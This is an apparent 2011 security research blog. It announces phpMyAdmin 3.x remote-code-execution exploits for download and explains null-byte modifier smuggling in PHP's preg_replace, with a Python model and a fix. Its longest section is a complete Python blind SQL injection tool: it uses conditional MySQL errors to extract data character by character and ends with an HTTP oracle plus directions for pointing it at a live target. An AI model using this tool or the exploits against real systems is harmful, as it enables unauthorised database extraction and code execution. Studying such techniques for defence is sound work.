Friday, July 29, 2011
Encrypt.se is a small tool that helps anyone to easily send encrypted messages. There is no registration, no cookies, no hassle.
Read more about it in this previous post: http://ha.xxor.se/2011/07/encryptse-beta-open-for-public.html
The Key Exchange feature enables users of Encrypt.se to communicate their secret crypto key to their friends over the phone, even if someone might be listening.
Saturday, July 9, 2011
phpMyAdmin 3.x Swekey RCI Exploit
Someone else submitted a working python exploit to exploit-db. It's already out there so I might as well publish my original exploit written in PHP.
2011-07-20 - Fixed some bugs in the exploit.
Download here
Friday, July 8, 2011
Encrypt.se Beta open for the public
Encrypt is a small project of mine, with its first stable beta recently opened up for public access. The goal has been to create an encryption tool for shorter messages which is as secure as possible, yet simple to use.
Click here to visit Encrypt.se
phpMyAdmin 3.x preg_replace RCE POC
I'm flooded with requests for a POC, and many doubt that these vulnerabilities are exploitable. Since this vulnerability is rather technically interesting, I believe many could learn from it.
The POC uses the session manipulation vulnerability in combination with the remote code execution in preg_replace as detailed in my last blogpost. It will only confirm if the instance is exploitable or not and you need to have valid credentials to the database. Use responsibly.
Download here
Edit: As 0x6a616d6573 reminded me, Blogger removes "%00" unless it is carefully encoded. The code posted here was messed up because of this (the downloadable file was still fine).
Now it's fixed. I also added the "//" as suggested.
Thursday, July 7, 2011
phpMyAdmin 3.x Multiple Remote Code Executions
This post details a few interesting vulnerabilities I found while relaxing and reading the source code of phpMyAdmin. My original advisory can be found here.
Wednesday, June 29, 2011
Null Byte Injection in preg_replace()
When reviewing some PHP code, I came across a real-world example of a strange and undocumented (though briefly mentioned in MOPS Submission 07) feature/bug in the function preg_replace. On certain systems, preg_replace seems to be vulnerable to a null byte injection. If both the first and second arguments are derived from user input, this could lead to remote code execution.
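To make the mechanism concrete, here is an added example (Python, written for this page; it is not the post's own PHP code or the phpMyAdmin code). It models the delimiter/modifier scan that older PHP versions applied to a preg_replace pattern: the pattern was walked as a C string, so the scan stopped at the first NUL byte and never saw the developer's own trailing delimiter and modifiers. That lets an attacker who controls the middle of a pattern append "/e" and a NUL byte, and PHP's "e" modifier made preg_replace evaluate the replacement argument as PHP code. Treating the scan this way is an assumption about the affected PHP versions; the names build_pattern, parse_pattern, evaluates_replacement, preg_quote and safe_user_pattern are this example's own.

```python
"""Model of NUL-byte modifier smuggling in preg_replace() patterns.

Added example, not code from the original page. The parse below models the
pattern scan of older PHP versions as a C-string walk (an assumption about
the affected versions); the function names are this example's own.
"""

# Modifiers old preg_* accepted; 'e' made preg_replace eval() the replacement.
KNOWN_MODIFIERS = set("imsxuUXADSe")

# Characters preg_quote() escapes in PHP, plus the chosen delimiter.
PREG_SPECIAL = set(".\\+*?[^]$(){}=!<>|:-#")


def build_pattern(user_input: str) -> str:
    """Vulnerable construction: untrusted text dropped into a pattern that
    the developer believes always ends in the '/i' they appended."""
    return "/" + user_input + "/i"


def parse_pattern(pattern: str):
    """Split a pattern into (body, modifiers) the way the modelled scan does.

    C-string semantics: the first NUL byte ends the string, so anything the
    developer appended after the attacker's NUL is never examined.
    """
    c_string = pattern.split("\x00", 1)[0]      # model of a strlen()-bounded scan
    delimiter = c_string[0]
    i = 1
    while i < len(c_string):
        if c_string[i] == "\\" and i + 1 < len(c_string):
            i += 2                               # skip an escaped character
            continue
        if c_string[i] == delimiter:
            break
        i += 1
    else:
        raise ValueError("No ending delimiter found")
    body = c_string[1:i]
    modifiers = set()
    for ch in c_string[i + 1:]:
        if ch in " \n":
            continue
        if ch not in KNOWN_MODIFIERS:
            raise ValueError(f"Unknown modifier '{ch}'")
        modifiers.add(ch)
    return body, modifiers


def evaluates_replacement(user_input: str) -> bool:
    """True when the attacker-controlled pattern part switches on 'e', i.e.
    the (also attacker-controlled) replacement would run as PHP code."""
    _, modifiers = parse_pattern(build_pattern(user_input))
    return "e" in modifiers


def preg_quote(text: str, delimiter: str = "/") -> str:
    """Model of PHP's preg_quote($text, $delimiter)."""
    return "".join("\\" + ch if ch in PREG_SPECIAL or ch == delimiter else ch
                   for ch in text)


def safe_user_pattern(user_input: str) -> str:
    """Hardened construction: refuse NUL bytes outright and quote the
    delimiter and metacharacters, so the input can only ever be a literal."""
    if "\x00" in user_input:
        raise ValueError("NUL byte in pattern input")
    return "/" + preg_quote(user_input, "/") + "/i"


if __name__ == "__main__":
    # Constructed inputs: the second one smuggles the 'e' modifier.
    for candidate in ("abc", "abc/e\x00"):
        print(repr(candidate), "->", parse_pattern(build_pattern(candidate)))
```

Without the NUL byte the same input ("abc/e") fails, because the scan continues into the developer's "/i" and trips over "/" as an unknown modifier; the NUL is what turns a harmless-looking pattern fragment into a code-execution switch. The fix is the one the hardened function models: reject NUL bytes and pass user input through preg_quote() so it can never reach the modifier position.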
Tuesday, June 21, 2011
Speeding up Blind SQL Injections using Conditional Errors in MySQL
Please note that this article expects some prior knowledge of blind SQL injections.
Edit: If you want to read about this in Russian, it was published here in 2009.
Edit2: jrm` provided me with a working implementation of this method, which he coded using information from this article. His code can be read at the bottom of this article or downloaded here.
Edit3: jrm` also created a Python script, which can be downloaded here.
Usually a syntax error in a blind SQL injection will have some sort of visible effect in the output of a web application. So what if we could conditionally generate such an error instead of relying on conditionally delaying and timing a request using functions such as BENCHMARK or SLEEP?
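The technique in working form, as an added example (Python; this is neither the post's own code nor jrm`'s implementation). It assumes a numeric WHERE-clause injection point on a MySQL backend whose failed queries leave a stable marker in the HTTP response (an error page, an empty result, anything detectable). The conditional error used here, (SELECT 1 UNION SELECT 2) placed where a scalar is expected, makes MySQL fail with "Subquery returns more than 1 row"; because IF() only evaluates the branch it takes, the error occurs exactly when the condition is false. A binary search over the ASCII range then needs seven requests per character, and each answer is in the response itself rather than in how long it took. The names payload, extract_char, extract, http_oracle and SimulatedMySQL, and the sample data, are this example's own.

```python
"""Blind SQL injection via conditional errors in MySQL.

Added example, not the post's own script or jrm`'s implementation.
Assumptions: integer WHERE-clause injection, MySQL backend, and a query
error that is visible in the HTTP response. The error trigger used as a
scalar, (SELECT 1 UNION SELECT 2), raises "Subquery returns more than
1 row"; IF() evaluates only the taken branch, so it errors iff the
condition is FALSE.
"""
import re
import urllib.parse
import urllib.request

ERROR_TRIGGER = "(SELECT 1 UNION SELECT 2)"


def payload(expr: str, pos: int, threshold: int) -> str:
    """Fragment appended to the query. The query errors iff the character
    at `pos` (1-based) of the result of `expr` has an ASCII code <= threshold."""
    return (f"AND IF(ASCII(SUBSTRING(({expr}),{pos},1))>{threshold},"
            f"1,{ERROR_TRIGGER})")


def extract_char(expr, pos, oracle):
    """Binary search over the 7-bit range: 7 requests per character
    instead of up to 127 equality tests or a SLEEP()-based timing loop.
    (Assumes ASCII data; widen `hi` to 255 for arbitrary bytes.)"""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(payload(expr, pos, mid)):   # error seen => code <= mid
            hi = mid
        else:
            lo = mid + 1
    return chr(lo)


def extract(expr, oracle, max_len=64):
    """Read the string `expr` evaluates to, one character at a time.
    MySQL's ASCII('') is 0, so a NUL marks the end of the value."""
    out = []
    for pos in range(1, max_len + 1):
        c = extract_char(expr, pos, oracle)
        if c == "\x00":
            break
        out.append(c)
    return "".join(out)


def http_oracle(url, param, base_value, error_marker):
    """Oracle against a real target: True when `error_marker` appears in
    the response. `base_value` is the legitimate parameter value (an id)."""
    def oracle(fragment):
        query = urllib.parse.urlencode({param: f"{base_value} {fragment}"})
        with urllib.request.urlopen(f"{url}?{query}") as resp:
            return error_marker in resp.read().decode("utf-8", "replace")
    return oracle


class SimulatedMySQL:
    """Offline stand-in for the target so the example runs without a
    database. It evaluates only fragments built by payload() against
    constructed data and reproduces the FALSE-branch error."""
    _pattern = re.compile(r"SUBSTRING\(\((.*?)\),(\d+),1\)\)>(\d+),1,")

    def __init__(self, data):
        self.data = data          # constructed: expression -> result string
        self.requests = 0

    def __call__(self, fragment):
        self.requests += 1
        m = self._pattern.search(fragment)
        expr, pos, threshold = m.group(1), int(m.group(2)), int(m.group(3))
        value = self.data[expr]
        code = ord(value[pos - 1]) if pos <= len(value) else 0
        return not code > threshold   # "Subquery returns more than 1 row"


if __name__ == "__main__":
    # Constructed sample: what SELECT user() would return on the target.
    target = SimulatedMySQL({"SELECT user()": "webapp@localhost"})
    print(extract("SELECT user()", target), "in", target.requests, "requests")
```

Against a live target, replace the simulator with http_oracle(url, "id", "1", "You have an error in your SQL syntax") or whatever marker the application leaks on a failed query. The point of the method is that the SLEEP()/BENCHMARK() delay, and the per-request waiting it imposes, disappears: each request answers immediately, and the only cost is the seven requests per character that the binary search needs.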